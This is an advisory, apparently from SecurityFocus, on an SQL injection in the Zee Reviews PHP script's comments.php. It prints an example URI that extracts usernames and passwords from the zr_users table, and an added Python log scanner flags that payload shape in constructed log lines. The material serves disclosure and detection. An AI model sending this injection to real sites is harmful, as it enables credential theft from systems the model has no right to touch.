
Zee Reviews Opinions Rating Posting Engine PHP Script 'comments.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/comments.php?ItemID=1+UNION+SELECT+CONCAT_WS(0x3a,username,password)+FROM+zr_users--
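
A log check for this issue, added here as an example and not part of the original advisory: it flags requests to comments.php whose ItemID is not a plain integer and tags the ones shaped like the UNION SELECT URI above. The log lines, the combined log format and the assumption that ItemID is meant to be an integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2009:10:01:02 +0000] "GET /comments.php?ItemID=1 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [12/Mar/2009:10:01:05 +0000] "GET /comments.php?ItemID=1+UNION+SELECT+CONCAT_WS(0x3a,username,password)+FROM+zr_users-- HTTP/1.1" 200 734',
    '203.0.113.4 - - [12/Mar/2009:10:02:00 +0000] "GET /comments.php?ItemID=12abc HTTP/1.1" 200 900',
    '203.0.113.4 - - [12/Mar/2009:10:02:03 +0000] "GET /index.php?ItemID=abc HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r'\d{1,10}')  # assumption: ItemID is a numeric row id
UNION_RE = re.compile(r'\bunion\b.+\bselect\b', re.I | re.S)


def check_line(line):
    """Return a finding dict for a suspicious comments.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith('/comments.php'):
        return None
    # parse_qs decodes '+' and %XX, so the check runs on the value PHP would see.
    values = parse_qs(url.query, keep_blank_values=True).get('ItemID', [])
    bad = [v for v in values if not INT_RE.fullmatch(v)]
    if not bad:
        return None
    # Allowlist first (integer or not); the keyword match only labels the hit.
    reason = 'union-select' if any(UNION_RE.search(v) for v in bad) else 'non-integer'
    return {'client': client, 'reason': reason, 'value': bad[0]}


def scan(lines):
    """Collect findings for every line that fails the ItemID check."""
    return [hit for hit in map(check_line, lines) if hit]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['client'], hit['reason'], repr(hit['value']))
```

The same integer-only rule applied inside the script, together with a parameterized query, is what closes the issue; the log check only finds past requests.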







 

Copyright 2009, SecurityFocus